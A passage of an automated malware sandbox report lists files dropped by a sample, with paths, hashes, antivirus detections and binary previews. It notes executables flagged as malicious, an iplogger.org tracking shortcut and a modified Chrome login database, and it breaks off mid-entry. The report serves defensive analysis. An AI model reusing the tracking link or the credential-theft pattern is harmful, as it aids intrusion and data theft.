                                                                                                              SHA1:BED09940E0337BC7FE6E839750A76EAFCB260CC8
                                                                                                              SHA-256:98D49983ADF4C7542B44BEDA4D3779862CDB4BF97D390EEF314C2673016DF157
                                                                                                              SHA-512:B48EC3BE49299FD5199199AC3392DE7888CA74C0EA5FAC0C5D172D0C1A63C8E99365453A8D762595662C558A134A7A7D97151FA69680BA698264E9AF0C0859BE
                                                                                                              Malicious:false
                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.1.0.7.8.3.3.0.5.4.2.9.2.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.1.0.7.8.3.3.5.0.4.2.9.2.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.b.0.7.c.d.3.-.a.2.9.6.-.4.d.8.c.-.b.6.c.f.-.b.5.c.a.8.7.8.8.6.e.1.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.e.f.d.e.8.3.6.-.f.e.f.2.-.4.5.f.7.-.8.2.3.0.-.d.6.e.4.3.a.d.b.e.c.b.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.0.0.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.2.0.2.0.1.1.0.9._.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.f.0.-.0.0.0.1.-.0.0.1.6.-.8.8.a.1.-.f.e.e.e.d.a.c.5.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.2.c.d.a.b.d.2.7.f.6.c.7.d.f.b.c.5.a.d.8.6.2.c.4.0.2.7.a.3.0.d.0.0.0.0.0.4.0.8.!.0.0.0.0.f.e.d.b.7.6.0.f.6.7.f.6.0.0.0.b.f.3.1.1.c.7.6.d.f.f.5.5.c.3.5.b.e.e.d.a.8.
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER439.tmp.dmp
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 14 streams, Sat Nov 28 23:05:31 2020, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):62728
                                                                                                              Entropy (8bit):1.8912382117232474
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:5llPvcmIwARaNqcYmN5x3qjlGtadY/xIKV/pkHa7ILDz9rGEUi1Tx7:lvcsAkg0N5x6GoW/x7Bq/kSX
                                                                                                              MD5:72AFCDBE07E222E0A9B13E1C9FC83751
                                                                                                              SHA1:0195A8A0CBB567E43903653126F7F16104D955B4
                                                                                                              SHA-256:F37A52664590A33123433479536BF9FA30DC9A5AD6A38B5BD8D188DD682BF356
                                                                                                              SHA-512:7D60C593C601FD6309714F70B467DCB08D91BA90F62F366BB4F8E8B7D232B2019F35AEF56015E7336855DBFD4513EA0321F047FCD6411986D948226EBF2B27B4
                                                                                                              Malicious:false
                                                                                                              Preview: MDMP....... .........._...................U...........B...... .......GenuineIntelW...........T.............._.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA45.tmp.WERInternalMetadata.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8286
                                                                                                              Entropy (8bit):3.703844921832443
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:Rrl7r3GLNir66p6YC369gmfjSBCpDK89bN/sfEvm:RrlsNim6p6Y669gmfjSCNkfh
                                                                                                              MD5:5E1680D58C9310366B58FA0BECDE2CDE
                                                                                                              SHA1:E1A2403D1DA40605DC82418454C57961B5534B1E
                                                                                                              SHA-256:A736E83BA14E746424058B6CDB09DAE60E5F207757AE6E35ADDD170736F1B50A
                                                                                                              SHA-512:8CDE417E7F9220421F3A7B42464A240171D0D42647151B6B243C0F509CEBD7B8B78610F14F8B331FCE4751E94462BFD7C86261BC990AA96DC36C227415AC767A
                                                                                                              Malicious:false
                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.6.8.<./.P.i.d.>.......
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERD05.tmp.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4628
                                                                                                              Entropy (8bit):4.463401774562659
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwSD8zsVJgtWI9b7WSC8BnM+8fm8M4JsIhFFdI+q8OKaD4Evgqbd:uITfvkKSN8JBrIrB4Evgqbd
                                                                                                              MD5:719846863F13CDFE6A4B6C2AD6340F65
                                                                                                              SHA1:E1A00C1AF960014F33D14771CD7541BAAA7D8E8D
                                                                                                              SHA-256:75E86458817096DC98B0A6844DBFEF3A5BD125BE2F9BC4E26012DFB0F501513C
                                                                                                              SHA-512:0A6CEC446C4F3032C32DEB12C34BBD87C38DAC3BB423D6FD619F7FDC9B431940411BA930523B1830453D50544EE7E19758F07C4562530EE80E057B1C8D205713
                                                                                                              Malicious:false
                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="749296" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERD78B.tmp.dmp
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 14 streams, Sat Nov 28 23:05:20 2020, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):66612
                                                                                                              Entropy (8bit):1.9820330049632604
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:K1Oc59bDqecmIwARaNqcYmN5x3T4Fb8C6adY/xIKV/pmyx+mw/KOtuaG/SeOjr:8HyecsAkg0N5xcFbF1W/x7BmyCdjeo
                                                                                                              MD5:E24FB2EEBF67A573571B8420646E8774
                                                                                                              SHA1:2AE347D084DD202B1A480B0AD80C90EEA9C33C37
                                                                                                              SHA-256:D0D2A8D25A43130FC1DE5786080F531584F128E4D3125A4E7AB9BEC0D2EE916B
                                                                                                              SHA-512:9D7EBA878D08508AD2120E670E97463E7CFDDB0986ED0DE82DDA63C71C8E6E27B58BDC65679082C79A248241CB4D3B61673CFDED2E492F87C4E8739872C37531
                                                                                                              Malicious:false
                                                                                                              Preview: MDMP....... .........._...................U...........B...... .......GenuineIntelW...........T.............._.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD97.tmp.WERInternalMetadata.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8286
                                                                                                              Entropy (8bit):3.7043446739903163
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:Rrl7r3GLNirZ6Nz6YCM69gmfXS5d6XCprl+89bO/sfaam:RrlsNil6J6YJ69gmfXS5MCOkfO
                                                                                                              MD5:A97C062B460F1282B1C3003BD4B5DAC7
                                                                                                              SHA1:11ED92911321C80907CAD4BAD55F14D41F4FDAB8
                                                                                                              SHA-256:452040C59F65042A6FFC4031A66170F9E053F2C999B2384D7320B17666DF5460
                                                                                                              SHA-512:C8F443B8AEB190FA5E5C6755CF5D0CA0DC1624512DD37CBFF3FC5F5D2A5E1EB065470CC34F13E6BE5591FFE315BE11F8C8CD9C18E8CF45AAB7AFC58094AFFF53
                                                                                                              Malicious:false
                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.6.8.<./.P.i.d.>.......
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERDFCB.tmp.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4632
                                                                                                              Entropy (8bit):4.468168107337762
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwSD8zssJgtWI9b7WSC8BU8fm8M4JssZFt+q8cD/4Evgqbd:uITfqkKSNDJtxr/4Evgqbd
                                                                                                              MD5:69934B4EA55B849D6507300552AD293F
                                                                                                              SHA1:8254DD228E1685D7AACA7F54F3C5F2A284F4B2C8
                                                                                                              SHA-256:A84AB5A40CD2F2FE21573ED70246AC8BA492150AC8F0BFE24A6D9086600689CB
                                                                                                              SHA-512:19C3EB1B8AF3FE12B05174DC6068B1E2992AFA85D202764233317C6F8534E72D2B003E8BD6DC235313F0B8C3CD8576AA9DB3132C05CF361BF6C64CCB7287D79C
                                                                                                              Malicious:false
                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="749295" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                              C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibCa.dll
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4096
                                                                                                              Entropy (8bit):6.867501832742936
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:PAWqGuIO1w7JElw764ulqk4uWdCXufAx8Su2yk:oWaIO1S7ulqBhv+yk
                                                                                                              MD5:04F3C7753A4FCABCE7970BFA3B5C76FF
                                                                                                              SHA1:34FC37D42F86DAC1FD1171A806471CDFEAE9817B
                                                                                                              SHA-256:A735E33A420C2AD93279253BC57137947B5D07803FF438499AAAF6FD0692F4CD
                                                                                                              SHA-512:F774FC3F3EBF029DC6F122669060351CC58AE27C5224ABE2A6C8AB1308C4B796657D2F286760EB73A2AE7563EEEF335DAA70ED5E4B2560D34CA9873017658AFE
                                                                                                              Malicious:false
                                                                                                              Preview: ..MZ.........0......8-..@.8.0..p.........!...L.!This. program. cannot .be run i.n DOS mo.de....$...PE..L....d82........!..0............. ..B................... ...........@..*..-......#......`....O...+h..........(.Q..........8W.....O......HA...text..........u.[.......`.rsrc...M;.}.t.......@.0relo...U..)......B.......5...&......S..4o.......F.......s....(.....*..(....{.%...{.9....[...4.*..(".....}...."}A...}....D.}..6..B.(...+**D...* 6..si.......*...0.....,....(.....~......oRj..*&.....N"(@M.-...on.A..0......!H.(...o...."r..p(...(.E..r@.po.@.....o..........%.B.....(.@........o...&..% ....o.x......u...,..B...o!..B!....!...~...Tu.."..[......#E..8...o"..$Q ....c..o....*..*..`......IT..G.:. `....@;.`.0...`. 5.@.r?..pB1..s#.....A.R.%.r..p.%.DrW...%..*rFq .b*..s....%.o%@.%.oB&....o'...Do(..........o)......"o.>.o+..,oE..,a..+?.,-.@.t.7.a-%o......Yo/.../.o.].....-...r..../. #"...1..-......u.>....., ...o2......#...>....L....X..a"0.$..V..h".r..."3a..r.`.rZ@..p.(4 ....+!rh..c.B..r...po..D.U.*..*.
                                                                                                              C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibClr.dll
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):52520
                                                                                                              Entropy (8bit):6.011934677477037
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:9GyM4uxlvOe/c1xpfLIa97v3A5KobiPWh:9G1vt/g7fLb97Y5VmY
                                                                                                              MD5:928E680DEA22C19FEBE9FC8E05D96472
                                                                                                              SHA1:0A4A749DDFD220E2B646B878881575FF9352CF73
                                                                                                              SHA-256:8B6B56F670D59FF93A1C7E601468127FC21F02DDE567B5C21A5D53594CDAEF94
                                                                                                              SHA-512:5FBC72C3FA98DC2B5AD2ED556D2C6DC9279D4BE3EB90FFD7FA2ADA39CB976EBA7CB34033E5786D1CB6137C64C869027002BE2F2CAD408ACEFD5C22006A1FEF34
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d82............!..0.................. ........... ....................... ............@.....................................O.......h...............(...............8............................................ ............... ..H............text........ ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........S..4o..........................................................F......s....(....*..(....*..{....*..{....*..{....*..{....*..(......}......}......}.......}....*6..{....(...+**..{......*6..si........*...0...........(.....~........oj...*&~.......*N(....-.~.....on...*.0..........(....o......r...p(....(....r...po.......o...........%.~.......(..........o....&........o .......u....,.~......o!...on... ...!...~..u....,.~......o!...on... ..."...[..u....,.~......o!...on... ...#
                                                                                                              C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\sib.dat
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1864
                                                                                                              Entropy (8bit):4.118434704813
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:DAC+SWx9cbv+eufJft0II/PD3Ccb2/SG+Df:DA3locxlX8ryxSG+
                                                                                                              MD5:04D0BDDEDBBC170CF791228E77032526
                                                                                                              SHA1:BF83D0C38B89D40CB72B63C4F1E74334F11B20D7
                                                                                                              SHA-256:B8571739BDAE473B25C929F9033087B3DCCDC84BBA6DC06586CEAD7C39A39123
                                                                                                              SHA-512:A0FFB05A1F8474AAE9FDB470ACF4DF918332C31B85C3CA7D7B8EF8D8599F058EDBFC374B9C49E7570D7A61F1E8A0A0B3B0CBF22ACA1416C35F03F7FB010D4C62
                                                                                                              Malicious:false
                                                                                                              Preview: ...&{.F.9.2.6.6.1.3.6.-.2.C.E.2.-.4.6.F.8.-.B.C.6.6.-.F.D.D.9.1.8.5.E.4.2.9.6.}.....p.1.........................a.d.m.i.n.....0...0...0.............I.:.\.n.e.w._.k.i.l.l.\.p.1.\.e.x.e.....p.1.(.3.)...e.x.e..E.{. "appVersion": "6.0.8",. "arpNoRemove": true,. "arpNoRepair": true,. "arpNoShow": true,. "lang": "en-US",. "productCode": "{F9266136-0000-46F8-BC66-FDD9185E4296}",. "uiScriptTest": false,. "uid": "{4401C0A1-7F46-4838-BBE8-B6F17E74AA74}",. "upgradeCode": "{9AC75AA0-89B9-4E79-86B4-89FBE7867A1E}".}...!%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.S.H.E.L.L.3.2...d.l.l..........................................................&{.F.1.7.5.3.6.5.4.-.C.5.F.7.-.4.7.C.C.-.B.1.E.D.-.1.E.7.D.D.7.5.C.E.4.8.F.}.........s.e.t.u.p.........I.:.\.n.e.w._.k.i.l.l.\.p.1.\.s.e.t.u.p...e.x.e.................T.e.m.p.\.0.\.s.e.t.u.p...e.x.e.....-.s.........................................]{."ignoreFailure": false,."uiDisabled" : false,."uiHidden" : false,."uiUnSelected" : false
                                                                                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                              Category:modified
                                                                                                              Size (bytes):40960
                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                              Malicious:false
                                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Setup.exe.log
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):135
                                                                                                              Entropy (8bit):5.045303121991894
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:QHXMKa/xwwUCztJXILKNUhh+9Am12MFuAvOAsDeieVyn:Q3La/xwczfIWW+P12MUAvvrs
                                                                                                              MD5:BB527FDBC763485B0662FCCFD53AA00A
                                                                                                              SHA1:86438ECBAF308B24FA264C7B6ECECDABD1338DC0
                                                                                                              SHA-256:6158C0B5B794617AAD8DA6D671FEF9EDE9CAB2AA9A9FAD91D038739DFF5CEDBD
                                                                                                              SHA-512:2003E36806330552D7DD5E633F24A67F2F4226C12EE43A6F79BB709727DD52910CA5EAF336F9C1E5733C66BC3075CA24CACA19D086BE373B76AA08D3FA818106
                                                                                                              Malicious:false
                                                                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.JScript, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                              C:\Users\user\AppData\Local\Temp\85F91A36E275562F.exe
                                                                                                              Process:C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):411041792
                                                                                                              Entropy (8bit):0.15732403368611694
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:
                                                                                                              MD5:1B22D5DB9CD16098D4B8B38398029F4E
                                                                                                              SHA1:5E3CD7DE596C320A9F44F37703C787FEA211639C
                                                                                                              SHA-256:718E0B71FAE3F0273BF839E47814143B25D83ADDF2E15A90488E7883FE6077BC
                                                                                                              SHA-512:22F35D101C8ACD939258E2ACC4137AC0CBCB79422E9F16E336194A7DADB18B65FE19DA9A37D7D6E812E39E1C9C799C95069FDCAC36A0C9D3D68793F2DED31450
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@..................................................3.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L......K..........#..........@.......c....... ....@...........................................@.......@.....................<...T.......P........................................................................... ..@............................text............................... ....rdata..\.... ......................@..@.data............h..................@....rsrc...P............H..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1306112
                                                                                                              Entropy (8bit):6.779030665912039
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:dbM2T9m39cm3+dAu/+jmxsh6QlSfaf0+MHueYujiRDAV0w0I4r:5bTcmm32JrYlSCfziK+0w
                                                                                                              MD5:6503C9C4F19A4B33B701CC5B97B349BC
                                                                                                              SHA1:FEDB760F67F6000BF311C76DFF55C35BEEDA8B81
                                                                                                              SHA-256:B79D5E0C3939BB3DD877DD327AF8D16A9406D8ECA0B888938A0AD39B56311C1A
                                                                                                              SHA-512:641629267461AE617BB639BE4A1C4498FE0AEA101B447A9CF1FC78140A6194992DE3E60A2EB936001226DC088248ED37254D39914F5D0DCED1351C9039823BF6
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ft.....Q...Q...Q..OQ...Q..FQ...Q..GQ...Q..XQ...Q..CQ...Q...Q1..QDDWQ...QDDhQ...QDDiQ...Q.GmQ...Q.GSQ...Q...Q...Q.GVQ...QRich...Q........................PE..L......_.................v...........6............@..........................`............@..................................{...........?......................TG..................................p%..@............................................text....u.......v.................. ..`.rdata...............z..............@..@.data...` ..........................@....rsrc....?.......@...f..............@..@.reloc..TG.......H..................@..B................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\BTRSetp.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):163328
                                                                                                              Entropy (8bit):6.766041496975016
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:F/lD4amo19XRWkv4bOI67IKI1LP6nVqQDSAH6h:rDQo19XRKqI+Ip1LwzWAH6
                                                                                                              MD5:6A6B5428C65FAEA27AC602D0C817476C
                                                                                                              SHA1:849ECCDB3097FAC7368587E4688153D80A5E3A8B
                                                                                                              SHA-256:C2B40AA7A76A98A5DB6C8C5BC02EEA5A25321188A149F6ECEE61EEA189BBC8BD
                                                                                                              SHA-512:04AEDC253EDD23A18D8D563ADFEC5B234A2825AFA92CF3686244875E3E4B5BE17EADB25C6F4C58F40827E6D664F49BAEB2B34AB9F72A2BC83AAB20B485608787
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_.................h...............`... ....@.. ....................... ............@..................................g..S....................................................................................................`..H..........."^qcJ\p..#... ...$..................@....text...he...`...f...(.............. ..`.rsrc...............................@..@.reloc...............z..............@..B.....................|.............. ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\John_Ship.url
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<https://iplogger.org/1TT4a7>), ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):117
                                                                                                              Entropy (8bit):4.778776889587684
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfdCCAvKoXEL:J254vVG/4xPpuFJQxdCCASoe
                                                                                                              MD5:6670D1A3C9071DC7B0748F6818D7E1C3
                                                                                                              SHA1:AC02276BEC28157218DB0159BF83D85677ECF0DD
                                                                                                              SHA-256:6FA22C19F62054C0B6590112081AAF3217965C0216A029DE6390A2ECA7720F9B
                                                                                                              SHA-512:9433541797F6CB4AB93EA1B22A355030113C6131473C536DBFA52876D8928EDD0C160B05856849C9012A1EB8C67D2DFD8CE2E5DEDB2A1D6FF915103FC3E09472
                                                                                                              Malicious:false
                                                                                                              Preview: [{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://iplogger.org/1TT4a7..
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\SSSS.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
